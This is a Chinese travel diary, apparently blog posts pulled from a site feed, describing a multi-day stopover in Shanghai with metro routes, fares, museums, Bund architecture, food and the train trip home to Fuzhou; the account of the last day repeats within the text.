    ​大包小包拎着准备回去了!最后吃一吃上海特色小吃排骨年糕¥25 + 罗宋汤¥15。感觉挺甜的。

    11:55 G1659

    遍地新冠病毒

    G1659

    ​人民广场-2 号线-虹桥火车站,¥5。

    ​本来计划得挺美的,G1659 12:55 上海虹桥-16:51 福州,¥386。只要 3 小时 56 分钟就到了,结果自己候车的时候下象棋,也可能是玩得太累了,就走神了没得上车,喜提人在囧途😭。

    13:15 G1635

    G1635

    ​查了下改签二等座得好晚才回去,再买的话相当于这张票直接作废了。只好改签一等座了 G1635 14:34 上海虹桥-19:06,¥644😭,亏了大几百,时间还更长一点。

    ​于是这回怕走神,直接提前半小时站检票口前了。

    14:31 一等座

    Reading English book

    ​喜提宽敞无比的一等座,直接把行李箱放腿前都没事😇。然后坐一等座的话还会送一包小零食和一瓶水,炫完了。

    15:40 浙江杭州

    钱塘江上潮信来,今日方知我是我

    ​平生不修善果,只爱杀人放火。忽地顿开金绳,这里扯断玉锁。

    16:18 浙江金华

    我要去浙江师范大学😭!

    16:47 浙江衢州

    浙江小别墅

    ​看来,不只是福建人喜欢盖小别墅。

    19:09 福建福州

    两个月回来了感觉也不热了

    ​好吧只是不这么热,其实还是挺热的!

    福州欢迎您

    ​啊!南后街!啊!西湖左海!啊!福州站!啊!江滨!啊!两塔!啊!福建博物院!

    火车站南广场

    ]]>
    + 前言
            

    ​这是上海之旅的下半程!

    正文

    11.6

    07:55 滴水湖

    浦东新区の新区

    ​又是早早醒来出门了。人民广场-2 号线-龙阳路-16 号线-滴水湖,¥10。历时一个半小时,按时间来说坐高铁的话应该都可以到拙政园了😇。

    ​这地方跟雄安新区可像,周围基本都是沪 C 的车牌了。

    长江-1000

    ​“CJ-1000A” 发动机是我国第一款商用航空发动机产品,是装配国产大飞机的惟一国产动力。 取名 “长江” 寓意大客发动机 CJ-1000A 产品研制开创中国商用航空发动机产业发展先河,象征着中国商用航空发动机的无穷动力和源远流长。 “1000” ,代表发动机推力等级在 10000~1999kgf ,“A” 是第一型产品代号。

    大圆湖

    ​为了造一个“新区”,有个策略是挖一个大湖以形成一个美丽的人造景观。据房地产开发商说 50 年后这里就会变成上海市中心了!

    08:12 上海天文馆🤩

    据说是全上海最难约的馆

    ​即使是这么远,依旧有很多人。

    12:07 进城

    上海小别墅

    ​看完天文馆该进城了。滴水湖-16 号线-龙阳路-2 号线-世纪公园(其实坐过站了),¥9。这一片让我感觉即使是上海,还是有大片的地块是没有开发的。

    13:44 浦东 11 路

    奇葩路名

    ​想着到浦东了,重点是去看陆家嘴,在这之前可以再去看看上海动漫博物馆。

    ​梅花路海桐路-浦东 11 路-张江路祖冲之路,¥2。新区的车站名和路名总是这么的奇葩……

    13:48 上海动漫博物馆🤩

    张江戏剧谷

    ​虽然这个场馆没有中国动漫博物馆来的大,但是我觉得里面介绍的范围要比后者来的广。

    15:05 陆家嘴🤩

    上海著名建筑

    ​东方明珠广播电视塔,简称“东方明珠”,位于上海市浦东新区陆家嘴世纪大道 1 号,地处黄浦江畔,背拥陆家嘴地区现代化建筑楼群,与隔江的外滩万国建筑博览群交相辉映,1991 年 7 月 30 日动工建造,1994 年 10 月 1 日建成投入使用,是集都市观光、时尚餐饮、购物娱乐、历史陈列、浦江游览、会展演出、广播电视发射等多功能于一体的上海市标志性建筑之一。

    ​蹬个共享单车,然后广兰路-2 号线-陆家嘴。

    ​陆家嘴,到了,开左侧门。We are arriving at Lujiazui Station.(此处背景音乐 duang~duang~duang~)

    三件套

    ​调整一下视角,让注射器位于开瓶器和打蛋器中间的位置。

    ​上海环球金融中心占地面积 14400 平方米,总建筑面积 381600 平方米,拥有地上 101 层、地下 3 层 ,楼高 492 米,外观为正方形柱体。裙房为地上 4 层,高度约为 15.8 米。上海环球金融中心 B2、B1、2 和 3 层为商场、餐厅;7-77 层为办公区域(其中 29 层为环球金融文化传播中心);79-93 层为酒店;94、97 和 100 层为观光厅。

    ​上海金茂大厦占地面积 2.4 万平方米,总建筑面积 29 万平方米,其中主楼 88 层,高度 420.5 米,约有 20 万平方米,建筑外观属塔型建筑。裙房共 6 层 3.2 万平方米,地下 3 层 5.7 万平方米,外体由铝合金管制成的格子包层。金茂大厦 1-2 层为门厅大堂;3-50层是层高 4 米,净高 2.7 米的大空间无柱办公区;51-52 层为机电设备层;53-87 层为酒店;88 层为观光大厅,建筑面积 1520 平方米。

    ​上海中心大厦主要用途为办公、酒店、商业、观光等公共设施;主楼为地上 127 层,建筑高度 632 米,地下室有 5 层;裙楼共 7 层,其中地上 5 层,地下 2 层,建筑高度为 38 米;总建筑面积约为 57.8 万平方米,其中地上总面积约 41 万平方米,地下总面积约 16.8 万平方米,占地面积 30368 平方米。

    世纪大道

    ​看了看网红的三件套高手位有点远,于是我决定 give up!去看一个有意思的地方。

    迪士尼旗舰店

    各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具

    各色玩具

    见到祖宗了

    ​里面有我最喜欢的动漫人物!而且价格惊人🤧,原产地也就广东东莞,居然还是排队咔咔买,有钱の上海人。

    上海欢迎您!

    上海海洋水族馆

    ​14 年前曾到此一游!

    15:47 渡江

    望浦西

    坐个船船!

    ​腿去东昌路码头,送你回外滩码头!¥2。

    望浦东

    船头

    16:13 外滩-福州路🤩

    外滩 外滩 外滩

    外滩

    ​白天的外滩也别有一番风景!

    外滩牛

    ​外滩“金融牛”是美籍意大利裔著名雕塑家阿图罗·迪·莫迪卡(Arturo Di Modica)于 2010 年在上海世博会开幕之际为外滩金融广场设计创作的。

    开始 city walk 福州路!

    ​上海租界自西向东有几条重要的道路:Nankin Road、Kiukiang Road、Hankow Road、Foochow Road 和 Canton Road。中文名分别是南京路、九江路、汉口路、福州路和广东路(本来是广州路的,但是广东和广州的英文名是一样的,就传跑偏了)。南京路老外为了纪念《南京条约》签订而命名的,其他几条路的地名也是要么设租界、要么设海关的地方。

    ​身为福州人,我选择走一走福州路!

    逛一逛这条路
    老上海著名妓院一条路
    福州路 福州路

    福州路

    福州大楼
    福州大楼

    福州大楼

    ​福州大楼原名汉弥尔登大楼,1931 年开工,1933 年竣工。此楼分主楼和辅楼,辅楼称老大楼,六层,大门在福州路上,与主楼相连。主楼即新大楼,建筑面积 12294 平方米,公和洋行设计,新仁记营造厂施工。造型与风格乃是准现代派,中部 14 层,两翼 7-9 层。外观中凹,立面上多笔直的线条,看去简洁不紊,仅大门上顶层和塔楼有备案,属装饰艺术派。窗框除二楼和顶层正中三扇为卷形,余皆长方格形。大门用转门,门前上有两棚。底层外墙为花岗石,2 至 14 层为白水泥人造石。内部房间、走道、卫生间分别为硬木、人造大理石及马赛克地坪,大楼一部分为写字间出租,也有 66 套公寓客房以及停车间等。

    杏花楼

    外文书店
    外文书店

    外文书店

    ​当我高分考过六级后自以为英语水平应该不错了,于是自不量力地去外文书店整了本介绍外滩的英文书,£19.95,价格惊人相当于¥200😅,然而里面的内容还是看得不太懂,只能看着图片知道大概意思。

    福建福州

    ​这是福建中路和福州路的交叉口!

    666

    ​这是福州路 666 号!

    上海市基督教教务委员会

    17:27 黄河路

    开躺!

    ​这天的行程结束了!

    ​香迷糊的国际饭店蝴蝶酥让我念念不忘,上网查了下可以去哈尔滨食品厂买个替代品,也可以叫奥乐齐超市的外卖,这样就可以规避贪吃蛇排队了!

    11.7

    06:39 煎饼果子

    药药切克闹

    ​看手法就觉得没有河北保定煎得流畅,但味道还蛮好的🤧。

    07:09 静安寺🤩

    静安寺

    ​静安寺,又称静安古寺,位于上海市静安区,其历史相传最早可追溯至三国孙吴赤乌十年(247 年),初名沪渎重元(玄)寺。宋大中祥符元年(1008 年),更名静安寺。南宋嘉定九年(1216 年),寺从吴淞江畔迁入境内芦浦沸井浜边(今南京西路),早于上海建城。静安寺总建筑面积达 2.2 万平方米,整个庙宇形成前寺后塔的格局,由大雄宝殿、天王殿、三圣殿三座主要建筑构成,是上海最古老的佛寺。寺内藏有八大山人名画、文征明真迹《琵琶行》行草长卷。静安区亦由静安寺而闻名于世。静安寺的建筑风格是仿明代以前的建筑风格,典型的代表就是斗拱的形制。

    静安寺 静安寺

    多少楼台烟雨中

    ​据说是全中国最贵的寺庙,里面遍是黄金白银!进去要¥50,于是我决定就在外面转一转好了。

    狮子 狮子

    左右门神

    奇特建筑 奇特建筑

    不知道叫啥建筑

    07:58 光启南路

    光启南路 光启南路 光启南路

    上海老破小

    ​静安寺-7 号线-肇嘉浜路-9 号线-小南门,¥4。本来导航更推荐我 2 号线-世纪大道-9 号线-小南门,我看了下还得过江看着就蠢,于是我选择前者路线。

    ​还记得 14 年前住的地方叫做天意旅馆,位于复兴东路路口,光启南路内。故地重逢一下,全部拆迁了😷。

    08:13 城隍庙-豫园🤩

    城隍庙

    ​要走的时候再来看一看老上海吧!

    打蛋器下

    施工中

    ​¥10。结果看了个建筑工地🤧。里面基本都是老上海在拜拜拜?

    霍光大将军

    妈祖

    ​原来上海人也拜妈祖耶。

    豫园商城 豫园商城 豫园商城 豫园商城

    豫园商城

    ​进豫园需要¥40,下次一定,简单地在旁边的商城里逛个街吧。

    豫园地铁站

    ​该坐地铁回去了!这个地铁站让我觉得 14 年前坐地铁时就是这个站,当时年幼的我看到这花里胡哨的玩意直接傻了😵,后面家里人根本不敢做地铁,靠打车解决交通问题。

    ​豫园-14 号线-大世界-8 号线-人民广场,¥3。

    09:24 上海历史博物馆🤩

    跑马总会大楼

    ​上海市历史博物馆(上海革命历史博物馆),国家一级博物馆,位于上海市黄浦区南京西路 325 号(原上海美术馆),地处上海人民广场历史风貌保护区, 人民公园西侧,占地 10000 平方米,是全面综合反映上海 6000 年悠久地方历史及革命历史的地志性博物馆。

    ​趁还有一点点时间,再玩一个地方!

    ​一个比较冷门的博物馆,介绍着上海的历史(主要就是近代史了)。上海这个地方居然能有 6000 年的历史?

    西楼

    10:47 午饭

    排骨年糕+罗宋汤

    ​大包小包拎着准备回去了!最后吃一吃上海特色小吃排骨年糕¥25 + 罗宋汤¥15。感觉挺甜的。

    11:55 G1659

    遍地新冠病毒

    G1659

    ​人民广场-2 号线-虹桥火车站,¥5。

    ​本来计划得挺美的,G1659 12:55 上海虹桥-16:51 福州,¥386。只要 3 小时 56 分钟就到了,结果自己候车的时候下象棋,也可能是玩得太累了,就走神了没得上车,喜提人在囧途😭。

    13:15 G1635

    G1635

    ​查了下改签二等座得好晚才回去,再买的话相当于这张票直接作废了。只好改签一等座了 G1635 14:34 上海虹桥-19:06,¥644😭,亏了大几百,时间还更长一点。

    ​于是这回怕走神,直接提前半小时站检票口前了。

    14:31 一等座

    Reading English book

    ​喜提宽敞无比的一等座,直接把行李箱放腿前都没事😇。然后坐一等座的话还会送一包小零食和一瓶水,炫完了。

    15:40 浙江杭州

    钱塘江上潮信来,今日方知我是我

    ​平生不修善果,只爱杀人放火。忽地顿开金绳,这里扯断玉锁。

    16:18 浙江金华

    我要去浙江师范大学😭!

    16:47 浙江衢州

    浙江小别墅

    ​看来,不只是福建人喜欢盖小别墅。

    19:09 福建福州

    两个月回来了感觉也不热了

    ​好吧只是不这么热,其实还是挺热的!

    福州欢迎您

    ​啊!南后街!啊!西湖左海!啊!福州站!啊!江滨!啊!两塔!啊!福建博物院!

    火车站南广场

    ]]>
    @@ -276,7 +276,7 @@ /posts/Diary-%E6%B2%AA%E4%BA%86%EF%BC%88%E4%B8%80%EF%BC%89/ - 前言
            

    ​我终于把万恶的小论文搞定了😭!解决完小论文这个问题,就可以先回家去面对更多的问题……

    去哪中转溜达
    当两天沪✌先

    ​本次回家决定中转一下上海!

    ​本次行程参观了许多博物馆,由于博物馆中图片和文字量密集,如果把它们全部放在一张网页里,将会占据大量版面,还会影响加载速度!因此,我决定将博物馆的相关内容放在子文章中。

    ​对于我来说,排版游记文章花费的时间要比旅游的时间还要多……所以有时间慢慢弄吧。

    正文

    11.4

    07:24 金灿灿

    保定的秋天

    ​要走的这天,雾霾终于散去了。

    ​今年的银杏要比去年早黄了两周左右。

    09:07 大红门

    大红门

    ​正常来讲,这个“寒假”比两年前还要长一些。

    ​再见了保定!G2602 09:49 保定东-11:00 天津西,¥57.5。

    11:04 天津西

    我需要便捷换乘!

    ​第一次试着自己坐高铁换乘。下车后找《便捷换乘》的电梯,直接坐出去。

    11:07 塑料大棚

    曾风餐露宿一晚

    ​那些事情,已经过去了快两年,不是吗?

    ​大名鼎鼎的京沪高铁只过天津南而不过天津西……按照两年前的方法,再转个车直接到天津南。G2653 11:32 天津西-11:46 天津南,¥20。

    11:38 天津天际线

    看到天塔了!

    ​左边的高楼是天津现代城二期,339.6m,右边就是天塔了,415.2m。

    ​天津的城建还是很顶的。很可惜这几年天津一直是衰落的状态。

    ​耳机里一直单曲循环着《GTAV》里的 BGM《No Happy Endings》。游戏中出现这首歌的时候是崔佛发现麦克十几年前就背叛了自己,独自一人前往白雪皑皑的北洋克顿挖了麦克的假坟墓寻求真相。整首歌有着一股快节奏又有些空灵的气氛。而天津大学又称之为北洋大学,又看着天津逐渐逐渐远去的高楼,感觉还挺应景😅。

    11:39 巨大烂尾楼

    北方第一高

    ​这回近距离观察了世界第一高烂尾楼😅。

    ​在我心目中,一些城市有着代表性的颜色:

    • 北京是红色,庄严肃穆,中国红。
    • 天津是蓝色,濒临渤海湾,津城里的各个建筑也都以蓝色调为主。
    • 保定是灰色,天天可爱小雾霾,还有我读研时的各种痛苦经历😭。
    • 武汉是橙色,黄鹤楼和鹦鹉洲长江大桥,以及过早的烟火气息。
    • 上海是暗金色,之后逛的好几个场馆都把灯光压的很暗,夜晚的外滩也有种黑色的深沉和金色的华丽。
    • 福州是绿色,一年四季都不落叶的地方🤧。

    ​其他地方,诸如石家庄、南昌、广州、杭州等,倒是没有一种固定的色彩。

    11:46 进站直梯

    我需要在天津南换乘!

    ​两年前天津南的保安大叔不让我们便捷换乘,而是迫使我们出站测个核酸再进去😵。其实这个车站是有便捷换乘这个选项的。

    11:49 故地重游

    这就是天津南!

    ​感觉比保定东还要小的高铁站……

    候车中

    ​所乘车次:G11 12:33 天津南-16:38 上海虹桥,¥609(好贵啊!)。

    ​这里有想过能不能直接改签到 G129,还能早点到上海,后来又觉得还是休息一下吧。

    ​之前的 G325 通往福州的车次还在,这么久的车实在是太牢了。

    12:31 京沪高铁

    京沪大标杆

    ​也算是体验到了一把全中国最牛的高铁了,可惜没得靠窗的位置。这个高铁又称最具有班味的高铁,很多人估计坐这条线只是为了出差,在车上也得打开电脑办公。

    超高速!

    ​尽管车速已经拉满,而且中间只停靠省会济南和南京,但还是觉得时间漫长。

    13:30 山东济南

    百里黄河!

    ​乘高铁火车跨过黄河多次,这回总算被我抓拍到了~

    15:27 江苏南京

    饮马长江!

    ​公元 450 年,元嘉草草,封狼居胥,赢得仓皇北顾。北魏太武帝拓跋焘南伐刘宋,直逼建康,饮马长江😠👊!

    16:38 上海虹桥

    人挤人

    ​又是一个巨大站,出站出口都要排一会儿队。虽然上海虹桥站在全国高铁站里不算大的,但是虹桥机场跟它是连一起的,这加起来就 very 的 big 了。

    沪币警告!

    ​知道上海物价很高,也没想过会这么高😵,好吧这是在火车站里,我拒绝!还是到民宿附近解决晚饭问题吧。

    16:55 上海地铁

    四通八达

    ​纵横交错的上海地铁,你甚至可以乘地铁直接去拙政园!

    地铁站

    ​走了老长一会儿,从《虹桥 2 号航站楼》上的车而不是从《虹桥火车站》,这证明我走错路了😵。

    ​虹桥 2 号航站楼-2 号线-人民广场,¥5。

    17:49 解决晚饭

    虾仁水饺

    ​到民宿附近了。整了份虾仁水饺,没几粒¥28🥴,但是虾仁是饱满的。比火车站的要好一点,我可以接受!

    ​然后整了杯益禾堂,¥17。

    18:04 奇异建筑

    UFO?

    ​出来就被两座造型怪异的大楼吸引。

    ​国际饭店,于民国二十三年(1934 年)12 月 1 日建成投用,自竣工起至 1982 年为上海市最高建筑,其楼顶中心旗杆于 1950 年 11 月确定为上海城市测绘平面坐标原点。

    ​上海新世界丽笙大酒店由上海新世界股份有限公司投资兴建,由卡尔森环球酒店集团亚太公司管理,是其在中国管理的最大规模的“丽笙”品牌酒店。

    ​定的酒店位于黄河路 127 号,国际饭店楼下拐进去,三个晚上¥491.40,平均一个晚上¥163.8。房间很小,没窗户,但是有个洗衣机,我可以接受!

    ​国际饭店有卖西饼的地方,整个周围全是西饼奶油的味道,给我香迷糊了🤤。

    ​上海位于华东最东,天黑的可早,在酒店里洗了个澡躺一躺,差不多可以出去看看外滩了。

    19:23 闽菜

    新闽记

    ​坛起荤香飘四邻 佛闻弃禅跳墙来

    ​新闽记在保留古法传统技艺的前提下,食材甄选,烹调讲究,为食客呈现一道既充满情怀亦能代表闽菜文化的饕餮盛宴。

    ​新闽记甄选品质上乘福建漳港海蚌配以多种珍惜食材耗费数时熬制上好的“三茸汤”,待上席时,煮沸的鸡汤当席汆鲜肉,即刻体验闽菜之“清淡鲜脆”、“醇厚隽永”的至高味觉享受。

    ​看到一家闽菜馆,介绍的两种食物是我这个福建人基本没咋吃过的东西,这个闽菜之后更是听都没听说过😪。不过看这个文案,进去的客人得被狠狠宰一笔。

    19:27 南京路步行街🤩

    有点像江汉路

    ​又是一个到处卖东西的商业街了,想过这里人会很多,但还是比海心沙要好。

    ​这边有非常多的警察维持秩序。

    永安百货

    ​永安百货,简称永安,创办于 1907 年 6 月 28 日,是中国香港其中一家历史最悠久的连锁百货店,既是香港第二大华资百货公司,亦是早年上海南京路四大华资百货公司之一(当年先施公司、永安公司、新新公司和大新公司被合称为后四大公司)。

    上海时装商店

    ​上海时装商店(原先施公司)由德和洋行设计,是上海的“四大百货公司”之一,建筑整体为文艺复兴风格,装饰以巴洛克风格元素,现为上海时装商店。

    老凤祥银楼

    ​老凤祥。 老凤祥是国内唯一的由一个半世纪前相传下来的百年老店。上海老凤祥有限公司正是由创始于 1848 年的老凤祥银楼发展沿革而来,其商标“老凤祥”的创意,也源于老凤祥银楼的字号。

    慈安里大楼

    ​慈安里大楼位于上海市黄浦区南京东路 114 号,建于清光绪三十二年(1906 年),是 20 世纪外滩地段清水砖墙老大楼的典型代表之一,由英商爱尔德公司设计,采用法国文艺复兴风格。最初是上海的第一家百货公司,1999 年入选上海市第三批优秀历史建筑。

    东方明珠

    ​越靠近外滩,人越多。

    和平饭店

    The Palace Hotel

    ​和平饭店,原名华懋饭店,属芝加哥学派哥特式建筑。饭店位于上海的南京东路和外滩的交叉口。1929 年,犹太商人 Victor Sassoon 构思并创建了名为“华懋饭店 (Cathay Hotel)”的酒店,这就是后来的和平饭店。

    19:51 外滩系列🤩

    挤出来了!

    ​离开了老上海,引入眼帘的是浦东新上海!

    南京东路口

    ​外滩十八号,位于上海市外滩南京路口,原为英国渣打银行驻中国的总部。原名麦加利银行的外滩十八号,建于 1923 年。

    The Palace Hotel

    ​和平饭店南楼整体外观集中体现了文艺复兴形式,将英国维多利亚风格的砖砌效果与维多利亚后期的安妮女王复兴风格完全地揉和在一起,红砖饰带和楣式的处理手法表现了建筑师在求变与动感,以色彩和材质的对比达到装饰效果。

    字林西报大楼旧址(左)

    The North China Daily News Building

    ​字林西报大楼于 1923 年竣工(1951 年改名为桂林大楼),曾是当年外滩最高的大楼。《字林西报》的前身是创刊于 1850 年 8 月 30 日的英文《北华捷报》,为中国境内第一份新闻报纸,创办人是英国来沪的拍卖商奚尔门。

    和平饭店:北楼

    The Palace Hotel

    ​和平饭店北楼立面处理表现了装饰艺术风格,整体仅以竖向线条作为装饰主体,在檐部及基座部分使用抽象几何形装饰母题,并在各入口处、檐部正中等处,用反映业主身份的沙逊家族猎狗族徽作为装饰中心;外墙除第 9 层和顶部用泰山石面砖外,其余各层均用花岗石作贴面;在金字塔顶的周围还有四个非洲原始部落图腾似的装饰物。

    江海关

    ​读研三年成功打卡旧中国时期最有名的三个海关大楼:江汉关、粤海关和江海关!

    The Custom House

    ​海关大楼位于中山东一路 13 号,于 1925 年 12 月 15 日奠基,1927 年 12 月 19 日启用。这幢建筑占地面积为 5000㎡,建筑面积为 32500㎡,采用简化的新古典主义风格,其体量感带有现代建筑的一些影响。海关大楼与汇丰银行大楼共同构成外滩建筑天际线构图的一个中心,成为外滩建筑群中两幢最有代表性的建筑。

    老-陆家嘴
    新-陆家嘴

    一十四年

    ​十四年后,陆家嘴的高楼大厦更密集了!

    ​当时的老照片居然没有往右边多拍一点……

    ​PS 调色用的 Camera Row 滤镜:

    属性数值
    曝光-0.40
    对比度+70
    高光+26
    阴影-43
    白色-21
    黑色-5
    纹理+7
    清晰度+3
    去除薄雾+21
    东方明珠 三件套

    东方明珠与三件套

    ​尽管东方明珠实际上并没有环球金融中心和上海中心大厦高,但是由于透视关系,东方明珠还是显得更高些。

    浦东发展银行大楼

    The Hongkong and Shanghai Bank Building

    ​汇丰银行大楼,原指香港上海汇丰银行于 1923 年至 1955 年在上海的分行大楼,位于上海外滩 12 号,又名市府大楼,今天是上海浦东发展银行的总部驻地。1921 年 5 月 5 日大楼开工,1923 年 6 月 23 日建成,被认为是中国大陆近代西方古典主义建筑的最高杰作。大楼的设计者是著名的英资建筑设计机构公和洋行(Palmer & Turner Architects and Surveyors)

    皇冠大楼!

    The Great Northern Telegraph Company Building

    ​大北电报公司大楼,位于上海市中山东一路 7 号,为外滩风景线的组成部分之一。大楼所在土地,最初为美商旗昌洋行所有,后转入轮船招商局名下,大北电报远东公司则租借土地的使用权兴建该楼。1949 年以后,大楼为长江航运管理局所使用,泰国盘古银行上海分行为该建筑的使用者。大楼建于 1906 年,翌年建成,为欧洲文艺复兴建筑式样,1994 年该建筑入选上海市优秀历史建筑名录。

    The Westin Bund Center Shanghai

    ​上海威斯汀大饭店,坐落于举世闻名的上海外滩,楼高 26 层,由万豪国际酒店集团公司进行管理,2400 平方米的酒店大堂是上海少有的超五星级酒店大堂之一,挑高 26.5 的大堂中庭气宇轩昂,其中连接 4 个楼层的玻璃天梯更为匠心独具。

    The China Merchants Steam Navigation Company Building

    ​轮船招商局简称“招商局”,是中国近代史上第一家轮船运输企业,也是中国第一家近代民用企业,是由李鸿章发起的“官督商办企业”。企业由商人出资,合股的资本为商人所有,公司按照自己的规范章程制度管理。企业在政府监督之下,但是盈亏全归商办,与官无涉。

    大北电报公司大楼

    中国通商银行大楼

    The Russell & Co. Building

    ​中国通商银行大楼(外滩)是中国通商银行在上海外滩 6 号建造的银行大楼。是中国人创办的第一所银行,成立于 1897 年 5 月 27 日,创办人是盛宣怀。外滩 6 号原来是一家拍卖行,3 层殖民地式建筑。1906 年翻建,由英资玛礼逊洋行的格兰顿(F . M . Gratton)设计,建筑面积 4541 平方米,建筑风格为仿哥特式市政厅式样。顶部有一排尖顶。该大楼于 1906 年建造。开创时参照英商汇丰银行的管理办法。该行成立之初,国家即授予发行银元、银两的特权。

    最后两套!

    The McBain Building

    ​亚细亚大楼位于上海市延安东路外滩,中山东一路 1 号,上海解放后由上海市冶金设计院使用,一般也叫“冶金设计院大楼”,而年纪稍大的人仍习惯称它为“亚细亚大楼”。此楼建成于 1916 年,高 7 层,是当时外滩最高的一幢建筑,且又取得中山东路 1 号的门牌,故当时也有人称它为“外滩第一楼”。

    The Shanghai Club

    ​上海总会大楼是上海外滩建筑群中的一座著名建筑,位于上海外滩 2 号。 上海总会是英国在沪侨民的俱乐部,一个重要的社交场所,创设于 1861 年。1864 年建楼。1909 年在原址建 6 层新楼,1910 年 1 月启用。新楼占地 1811 平方米,建筑面积 9280 平方米。建筑立面为三段式处理,2-3 层中部有 6 根爱奥尼柱式的石柱,顶端各设置了巴洛克式的风亭,细部雕刻细腻优美。建筑设计师是 H.TARRANT。室内装潢由马海洋行的日本建筑师设下田菊太郎设计,装饰华丽,以长达 34 米的黑白大理石酒吧柜台著称。

    20:27 豫园商城-夜

    卖东西了!

    ​本来是想直接沿着九江路回去的,结果发现走远了,找一个就近的地铁站,豫园站。

    ​看小红书说晚上的豫园很好看,结果根本就没开门😅,估计是想说这个豫园商城吧。看上去全是崭新的仿古建筑。

    三吴之地

    ​上海也是个江南地区。这个灯打在传统苏式建筑上显得魔幻😵‍💫。

    20:56 国际饭店

    不排队了,但还是香迷糊了

    ​豫园-14 号线-大世界-8 号线-人民广场,¥3。

    ​该回酒店再洗个澡开躺了!发现国际饭店西饼屋门口都没人了,这才发现人家已经下班了😵。

    ​看了下到底是个啥玩意会引得这么多人排队?

    温馨提示

    尊敬的消费者

    上海国际饭店帆声西饼屋生产的一系列食品长期以来一直受到消费者的喜爱和认可,为此饭店表示衷心的感谢!由于蝴蝶酥等明星产品已成为市民、消费者竞相购买的热卖产品,为了提升您的购物体验度,饭店特此温馨提示如下:

    1. 请消费者有序排队,不要拥挤,严禁插队现象发生;
    2. 黄河路 28 号帆声西饼屋是国际饭店唯一官方门店。除此以外,饭店在奥乐齐超市、永安百货、汇金百货邵万生、三阳、新长发、老同盛等专柜均有饭店提供的蝴蝶酥等相关产品同步售卖。在此,提醒广大消费者请认准正规渠道购买国际饭店生产的蝴蝶酥等产品。
    3. 如发现不合理现象,可向我们门店及时反映,我们将与您共同营造一个温馨、有序、良好的购物环境。

    11.5

    06:28 十里香馄饨王

    老上海福建馄饨

    ​黄河路一条路基本都是吃的,找了家馄饨店解决早饭问题,¥14。扫码时发现这是个福建馄饨店。

    ​记得 14 年前每次都在光启南路的馄饨店吃早饭,当时那个老板也是福建的来着。

    明天广场

    ​明天广场,既有商业用房、公寓,酒店、商场、风味餐厅又有会议中心及宴会厅和健康设施,五十七至五十八层还设置为总统套房。是上海第六高的摩天大楼。地上 60 层,地下 3 层,高约 285 米,于 2003 年 10 月 1 日落成。

    ​上海 03 年的房子放到现在的河北都是第一高楼了……

    ​本来第一站是要去徐汇的游戏博物馆的,但是要 10 点才开门,于是我决定先去南边的世博园打发下时间。

    07:10 世博园系列🤩

    世博园地铁站

    ​人民广场-8 号线-中华艺术宫,¥3。

    ​世博园地铁站还挂着当年世博会的照片和画。

    世博源

    ​世博会的场馆基本都拆得差不多了,走马观花地看一些特别的场馆吧。

    中国馆

    ​中华艺术宫选址 2010 年上海世博会中国馆,总建筑面积达到 16.68 万平方米,拥有展示面积近 7 万平方米,共分为 6 个展示层面、35 个展厅,分别为 60 米层、49 米层、41 米层、33 米层、5 米层和 0 米层。中华艺术宫拥有 1.4 万件馆藏品,首批展出 1400 多件。中华艺术宫的艺术品分类由国画、油画、书法、版画、雕塑、皮影等组成。

    ​之后我想骑个共享单车去看卢森堡展馆,为什么呢?因为有了瓶醋想包一盘饺子。

    过气网红

    ​甚至已经掉色严重。

    梅赛德斯·奔驰中心

    ​还以为是当年大名鼎鼎的沙特馆,查了下并不是。

    大克鼎

    ​还以为是国博里的大盂鼎,查了下并不是,应该是上海博物馆镇馆之宝大克鼎。

    老-卢森堡大公国世博馆
    新-卢森堡大公国世博馆

    卢森堡大公国世博馆

    ​骑了这么久,就为了拍这张照片!

    ​曾经的世博园人挤人,现在周围一个人都没有。本来想找个人帮我拍一张的,只好那矿泉水瓶把手机架椅子上录像截屏了。

    世博园地图

    ​这附近也是一个地铁站也没有,只好硬着头皮走去最近的后滩站了。

    意大利馆 法国馆 俄罗斯馆

    意大利馆、法国馆、俄罗斯馆

    卢浦大桥

    ​卢浦大桥后的上海中心大厦。

    温室花园 温室花园

    温室花园

    08:34 要上班了!

    一股班味

    ​OK,终于腿到地铁站了!后滩站-7 号线-肇家浜路-9 号线-漕河泾开发区,¥4。

    ​到了上班高峰,地铁里的人开始多了起来,但看着没有北京广州那么夸张。

    08:56 Welcome to CHJ

    全是办公楼!

    ​一股闽侯高新区的感觉……

    08:57 中国音数协游戏博物馆🤩

    新研大厦

    ​这个博物馆居然要 10:00 才开门,还是来早了😵。在旁边看个纪录片休息一下吧。

    花里胡哨

    ​门票¥38。这个博物馆里除了我就是工作人员了……如果看过央美×中传游研社 电子游戏史这个系列的视频的话,对这个博物馆里的绝大多数东西还是能够了解的。里面的东西挺精美,但是感觉馆里对早期的游戏发展介绍比较齐全,对于 21 世纪后的游戏几乎没有什么介绍,简单地一笔带过了。

    11:46 上海电影博物馆🤩

    上海电影集团

    ​想想到了徐汇了就再逛逛徐汇的地标。桂箐路钦江路-927 路-漕溪北路裕德路,¥2。

    当当当!

    ​来到了上海电影博物馆!门票居然要¥60……自己对电影了解的属实是不够多,看得不是很懂😬。

    12:49 徐家汇圣母院

    徐家汇圣母院

    ​1867 年,郎怀仁主教邀请拯亡会修女来上海协助传教。1868 年他在徐家汇耶稣会总院东侧建造新楼,于翌年竣工。1869 年,献堂会被批准正式成立并迁至新楼内,第一批拯望会修女也定居于此,承担培养贞女的任务。是年 9 月 8 日,初学院举行开幕礼并招收 32 位贞女。徐家汇圣母院由此最终形成。

    12:51 徐家汇站

    中国游戏看上海 上海游戏看徐汇

    ​教堂在马路另一边,没路口过马路,只好从地铁站窜过去。

    12:56 徐家汇天主教堂🤩

    圣心大教堂
    徐家汇天主教堂
    圣心大教堂
    徐家汇天主教堂
    圣心大教堂
    徐家汇天主教堂

    圣心大教堂 VS 徐家汇天主教堂

    ​这简直就是广州圣心大教堂的红色版!

    徐家汇天主教堂 徐家汇天主教堂 徐家汇天主教堂

    徐家汇天主教堂

    ​对游客来说,比圣心大教堂更好的是,这里似乎不怎么做礼拜,所以可以直接进去参观,没有什么限制!

    徐家汇天主教堂 徐家汇天主教堂 徐家汇天主教堂

    洋庙

    ​之后就该撤了!本来这里有个徐家汇书院值得一逛,但是我觉得进去一阵拍打扰别人读书不太好就直接回去了。徐家汇站-1 号线-人民广场,¥3。

    13:33 苔圣园酒家

    苔圣园酒家

    ​回去充个电躺一躺!据说酒店所处的黄河路是《繁花》的取景地,然而我并没有看过这个电视剧……

    14:38 四行仓库🤩

    吴淞江北
